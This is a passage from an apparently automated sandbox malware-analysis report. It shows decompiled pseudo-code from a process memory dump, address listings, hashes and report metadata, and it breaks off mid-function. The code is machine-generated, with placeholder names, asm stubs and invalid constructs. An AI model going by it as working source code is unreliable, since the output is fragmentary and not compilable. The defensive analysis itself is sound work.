														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0133F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0133F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0133F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0133FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0133FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0133F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0133F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E013C4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0134D130(_t427, _t494, _t511);
				}
			}










































































                                          0x013c5ba5
                                          0x013c5baa
                                          0x013c5baf
                                          0x013c5bb4
                                          0x013c5bb6
                                          0x013c5bbc
                                          0x013c5bbe
                                          0x013c5bc4
                                          0x013c5bcd
                                          0x013c5bd3
                                          0x013c5bd6
                                          0x013c5bdc
                                          0x013c5be0
                                          0x013c5be3
                                          0x013c5beb
                                          0x013c5bf2
                                          0x013c5bf8
                                          0x013c5bfe
                                          0x013c5c04
                                          0x013c5c0e
                                          0x013c5c18
                                          0x013c5c1f
                                          0x013c5c25
                                          0x013c5c2a
                                          0x013c5c2c
                                          0x013c5c32
                                          0x013c5c3a
                                          0x013c5c3f
                                          0x013c5c42
                                          0x013c5c48
                                          0x013c5c5b
                                          0x013c5c5b
                                          0x013c5c2c
                                          0x013c5cb7
                                          0x013c5cb9
                                          0x013c5cbf
                                          0x013c5cc2
                                          0x013c5cca
                                          0x013c5ccb
                                          0x013c5ccb
                                          0x013c5cd1
                                          0x013c5cd7
                                          0x013c5cda
                                          0x013c5ce1
                                          0x013c5ce4
                                          0x013c5ce7
                                          0x013c5ced
                                          0x013c5cf3
                                          0x013c5cf9
                                          0x013c5cff
                                          0x013c5d08
                                          0x013c5d0a
                                          0x013c5d0e
                                          0x013c5d10
                                          0x00000000
                                          0x00000000
                                          0x013c5d16
                                          0x013c5d1a
                                          0x00000000
                                          0x00000000
                                          0x013c5d20
                                          0x013c5d22
                                          0x013c5d25
                                          0x013c5d2f
                                          0x013c5d2f
                                          0x013c5d33
                                          0x013c5d3d
                                          0x013c5d49
                                          0x013c5d4b
                                          0x00000000
                                          0x00000000
                                          0x013c5d5a
                                          0x013c5d5d
                                          0x013c5d60
                                          0x00000000
                                          0x00000000
                                          0x013c5d66
                                          0x013c5d69
                                          0x00000000
                                          0x00000000
                                          0x013c5d6f
                                          0x013c5d6f
                                          0x013c5d73
                                          0x013c5d79
                                          0x013c5d7f
                                          0x013c5d86
                                          0x013c5d95
                                          0x013c5d98
                                          0x013c5dba
                                          0x013c5dcb
                                          0x013c5dce
                                          0x013c5dd3
                                          0x013c5dd6
                                          0x013c5dd8
                                          0x013c5de6
                                          0x013c5dec
                                          0x013c5dee
                                          0x013c5df1
                                          0x013c5df3
                                          0x013c635a
                                          0x013c635a
                                          0x00000000
                                          0x013c635a
                                          0x013c5dfe
                                          0x013c5e02
                                          0x013c5e05
                                          0x013c5e07
                                          0x013c5e10
                                          0x013c5e13
                                          0x013c5e1b
                                          0x013c5e1c
                                          0x013c5e21
                                          0x013c5e22
                                          0x013c5e23
                                          0x013c5e25
                                          0x013c5e2a
                                          0x013c5e2c
                                          0x013c5e2e
                                          0x013c5e36
                                          0x013c5e39
                                          0x013c5e42
                                          0x013c5e47
                                          0x013c5e4d
                                          0x013c5e54
                                          0x013c5e54
                                          0x013c5e54
                                          0x013c5e2e
                                          0x013c5e5c
                                          0x013c5e5f
                                          0x013c5e62
                                          0x013c5e64
                                          0x013c5e6b
                                          0x013c5e70
                                          0x013c5e7a
                                          0x013c5e7a
                                          0x013c5e7a
                                          0x013c5e6b
                                          0x013c5e7e
                                          0x013c5e7f
                                          0x013c5e7f
                                          0x013c5e81
                                          0x013c5e87
                                          0x013c5e8b
                                          0x013c5e8c
                                          0x013c5e8c
                                          0x013c5e8c
                                          0x013c5e9a
                                          0x013c5e9c
                                          0x013c5ea2
                                          0x013c5ea6
                                          0x013c5f50
                                          0x013c5f50
                                          0x013c5f57
                                          0x013c5f66
                                          0x013c5f66
                                          0x013c5f66
                                          0x013c5f68
                                          0x013c5f6a
                                          0x013c63d0
                                          0x00000000
                                          0x013c5f70
                                          0x013c5f70
                                          0x013c5f91
                                          0x013c5f9c
                                          0x013c5f9e
                                          0x013c5fa4
                                          0x013c5fa6
                                          0x013c638c
                                          0x013c6392
                                          0x013c63a1
                                          0x013c63a7
                                          0x013c63af
                                          0x013c63af
                                          0x013c63bd
                                          0x013c63d8
                                          0x00000000
                                          0x013c63d8
                                          0x013c5fac
                                          0x013c5fb2
                                          0x013c5fb4
                                          0x013c5fbd
                                          0x013c5fc6
                                          0x013c5fce
                                          0x013c5fd4
                                          0x013c5fdc
                                          0x013c5fec
                                          0x013c5fed
                                          0x013c5fee
                                          0x013c5fef
                                          0x013c5ff9
                                          0x013c5ffa
                                          0x013c5ffb
                                          0x013c5ffc
                                          0x013c6000
                                          0x013c6004
                                          0x013c6012
                                          0x013c6012
                                          0x013c6018
                                          0x013c6019
                                          0x013c601a
                                          0x013c601b
                                          0x013c601c
                                          0x013c6020
                                          0x013c6059
                                          0x013c605c
                                          0x013c6061
                                          0x013c6061
                                          0x013c6022
                                          0x013c6022
                                          0x013c6022
                                          0x013c6025
                                          0x013c602a
                                          0x013c602b
                                          0x013c6031
                                          0x013c6037
                                          0x013c6038
                                          0x013c603e
                                          0x013c6048
                                          0x013c6049
                                          0x013c604a
                                          0x013c604b
                                          0x013c604c
                                          0x013c604d
                                          0x013c6053
                                          0x013c6054
                                          0x013c6054
                                          0x013c6062
                                          0x013c6065
                                          0x013c6067
                                          0x013c606a
                                          0x013c6070
                                          0x013c6075
                                          0x013c6076
                                          0x013c6081
                                          0x013c6087
                                          0x013c6095
                                          0x013c6099
                                          0x013c609e
                                          0x013c60a4
                                          0x013c60ae
                                          0x013c60b0
                                          0x013c60b3
                                          0x013c60b6
                                          0x013c60b8
                                          0x013c60ba
                                          0x013c60ba
                                          0x013c60ba
                                          0x013c60ba
                                          0x013c60be
                                          0x013c60c0
                                          0x013c60c5
                                          0x013c60c5
                                          0x013c60c5
                                          0x013c60c6
                                          0x013c60cd
                                          0x013c6114
                                          0x013c60cf
                                          0x013c60cf
                                          0x013c60d4
                                          0x013c60d5
                                          0x013c60da
                                          0x013c60db
                                          0x013c60e1
                                          0x013c60e2
                                          0x013c60e8
                                          0x013c60f8
                                          0x013c60fd
                                          0x013c60fe
                                          0x013c6102
                                          0x013c6104
                                          0x013c6107
                                          0x013c6109
                                          0x013c610b
                                          0x013c610b
                                          0x013c610b
                                          0x013c610b
                                          0x013c610f
                                          0x013c610f
                                          0x013c6117
                                          0x013c611a
                                          0x013c611f
                                          0x013c6125
                                          0x013c6134
                                          0x013c6139
                                          0x013c613f
                                          0x013c6146
                                          0x013c6148
                                          0x013c614b
                                          0x013c614d
                                          0x013c614f
                                          0x013c614f
                                          0x013c614f
                                          0x013c614f
                                          0x013c6153
                                          0x013c6159
                                          0x013c6159
                                          0x013c615c
                                          0x013c6163
                                          0x013c6169
                                          0x013c616c
                                          0x013c6172
                                          0x013c6181
                                          0x013c6186
                                          0x013c6187
                                          0x013c618b
                                          0x013c6191
                                          0x013c6195
                                          0x013c61a3
                                          0x013c61bb
                                          0x013c61c0
                                          0x013c61c3
                                          0x013c61cc
                                          0x013c61d0
                                          0x013c61dc
                                          0x013c61de
                                          0x013c61e1
                                          0x013c61e4
                                          0x013c61e6
                                          0x013c61e8
                                          0x013c61e8
                                          0x013c61e8
                                          0x013c61e8
                                          0x013c61e6
                                          0x013c61ec
                                          0x013c61f3
                                          0x013c6203
                                          0x013c6209
                                          0x013c620a
                                          0x013c6216
                                          0x013c621d
                                          0x013c6227
                                          0x013c6241
                                          0x013c6246
                                          0x013c624c
                                          0x013c6257
                                          0x013c6259
                                          0x013c625c
                                          0x013c625e
                                          0x013c6260
                                          0x013c6260
                                          0x013c6260
                                          0x013c6260
                                          0x013c625e
                                          0x013c6264
                                          0x013c6267
                                          0x013c6269
                                          0x013c6315
                                          0x013c6315
                                          0x013c631b
                                          0x013c631e
                                          0x013c6324
                                          0x013c6327
                                          0x013c632f
                                          0x013c6330
                                          0x013c6333
                                          0x013c633a
                                          0x013c633c
                                          0x013c6335
                                          0x013c6335
                                          0x013c6335
                                          0x013c633f
                                          0x013c6342
                                          0x013c634c
                                          0x013c6352
                                          0x013c6355
                                          0x013c6355
                                          0x013c6359
                                          0x00000000
                                          0x013c626f
                                          0x013c6275
                                          0x013c6275
                                          0x013c6278
                                          0x013c627e
                                          0x013c627e
                                          0x013c6281
                                          0x013c6287
                                          0x013c628d
                                          0x013c6298
                                          0x013c629c
                                          0x013c62a2
                                          0x013c629e
                                          0x013c629e
                                          0x013c629e
                                          0x013c62a7
                                          0x013c62a7
                                          0x013c62aa
                                          0x013c62b0
                                          0x013c62f0
                                          0x013c62f0
                                          0x013c62f2
                                          0x013c62f8
                                          0x013c62fd
                                          0x013c62b2
                                          0x013c62b2
                                          0x013c62b2
                                          0x013c62b5
                                          0x013c62dd
                                          0x013c62e2
                                          0x013c62e5
                                          0x013c62b7
                                          0x013c62b8
                                          0x013c62bb
                                          0x013c62bd
                                          0x013c62c0
                                          0x013c62c4
                                          0x013c62cd
                                          0x013c62cd
                                          0x013c62c0
                                          0x013c62bb
                                          0x013c62b5
                                          0x013c6302
                                          0x013c6303
                                          0x013c6305
                                          0x013c6305
                                          0x013c6305
                                          0x013c630c
                                          0x013c630c
                                          0x00000000
                                          0x013c627e
                                          0x013c6269
                                          0x013c5eac
                                          0x013c5ebb
                                          0x013c5ebe
                                          0x013c5ecb
                                          0x013c5ecb
                                          0x013c5ece
                                          0x013c5ece
                                          0x013c5ed4
                                          0x013c5ed7
                                          0x013c5ed9
                                          0x013c5edb
                                          0x013c5edb
                                          0x013c5ee1
                                          0x013c5ee1
                                          0x013c5ee3
                                          0x013c5f20
                                          0x013c5f20
                                          0x013c5ee5
                                          0x013c5ee5
                                          0x013c5ee5
                                          0x013c5ee8
                                          0x013c5f11
                                          0x013c5f18
                                          0x013c5eea
                                          0x013c5eea
                                          0x013c5eed
                                          0x013c5ef2
                                          0x013c5ef8
                                          0x013c5efb
                                          0x013c5f0a
                                          0x013c5f0a
                                          0x013c5eed
                                          0x013c5ee8
                                          0x013c5f22
                                          0x013c5f28
                                          0x00000000
                                          0x00000000
                                          0x013c5f30
                                          0x013c5f31
                                          0x013c5f37
                                          0x013c5f3a
                                          0x013c5f3d
                                          0x013c5f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c5f46
                                          0x013c5f48
                                          0x013c5f4d
                                          0x00000000
                                          0x013c5f4d
                                          0x013c5dda
                                          0x013c5ddf
                                          0x00000000
                                          0x013c5ddf
                                          0x013c5dd8
                                          0x013c5da7
                                          0x013c5da9
                                          0x013c5dac
                                          0x013c5dae
                                          0x00000000
                                          0x013c5db4
                                          0x013c5db4
                                          0x00000000
                                          0x013c5db4
                                          0x013c5dae
                                          0x013c5d88
                                          0x013c5d8d
                                          0x013c6363
                                          0x013c6369
                                          0x013c636a
                                          0x013c6370
                                          0x013c6372
                                          0x013c637a
                                          0x013c637b
                                          0x013c637d
                                          0x00000000
                                          0x00000000
                                          0x013c637f
                                          0x013c6385
                                          0x00000000
                                          0x013c6385
                                          0x013c5d38
                                          0x013c5d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c5d3b
                                          0x013c5d27
                                          0x013c5d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c6360
                                          0x00000000
                                          0x013c6360
                                          0x013c5c10
                                          0x013c5c10
                                          0x013c63da
                                          0x013c63e5
                                          0x013c63e5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cdd1309ed9c310b2c4100fb7de5a1dd0720f5c004d8a9d2c2b6693d39da4799
                                          • Instruction ID: a654e148c3fb34a335590df2a0fe9c300ae8c7726826e66ee60f8e3fa17def1a
                                          • Opcode Fuzzy Hash: 4cdd1309ed9c310b2c4100fb7de5a1dd0720f5c004d8a9d2c2b6693d39da4799
                                          • Instruction Fuzzy Hash: 84423DB5A00229CFDB24CF68C841BA9BBB5BF45708F1481AED94DAB352D734AD85CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01316E30 Relevance: .5, Instructions: 481COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E01316E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x13cfca8);
				_push(0x13417f0);
				_push( *[fs:0x0]);
				_t312 =  *0x13ed360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E0133FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E013174C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E01329BC6( &_v52, 0x12d1080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E01339377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E013746A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M0131749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E012F52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L01302600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L01302600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L01374735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E0133BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E01322010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
